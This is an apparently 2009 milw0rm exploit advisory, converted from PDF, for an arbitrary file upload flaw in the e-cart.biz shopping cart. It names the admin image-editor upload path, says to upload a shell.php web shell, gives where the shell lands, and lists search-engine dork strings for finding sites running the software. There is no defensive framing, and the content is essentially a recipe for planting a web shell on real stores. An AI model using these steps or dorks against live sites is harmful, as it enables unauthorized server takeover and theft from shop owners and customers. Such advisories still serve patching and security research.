ecart.biz Shopping Cart Arbitrary File Upload Vulnerability.pdf

1 =−=−Remote Arbitrary File Upload−=−= 2 3 −=−=−=−=−=−=−=−=−=−=−=−=−=−==−=−=−=−=−=−=−=−=−=−= 4 script::e−cart Shopping Carts 5 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 6 Author: ahmadbady 7 8 =−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−= 9 download from:http://www.e−cart.biz/e−cart_Free.zip 10 11 =−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−= 12 upload: 13 /path/admin/editor/image.php −−> upload shell.php 14 15 shell.php −−−> /path/images/upload/shell.php 16 17 =−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−==−=−=−=−=−=−=−= 18 =−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−==−=−−=−=−=−=−=−=− 19 20 dork: 21 "Powered by e−cart.biz Shopping Carts & Storefronts" 22 "Powered by e−cart.biz Shopping Carts" 23 24 −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−==−=−=−=−=−=−=−=−=−=−= 25 26 # milw0rm.com [2009−04−17] Page 1/1 ecart.biz Shopping Cart Arbitrary File Upload Vulnerability ahmadbady 04/17/2009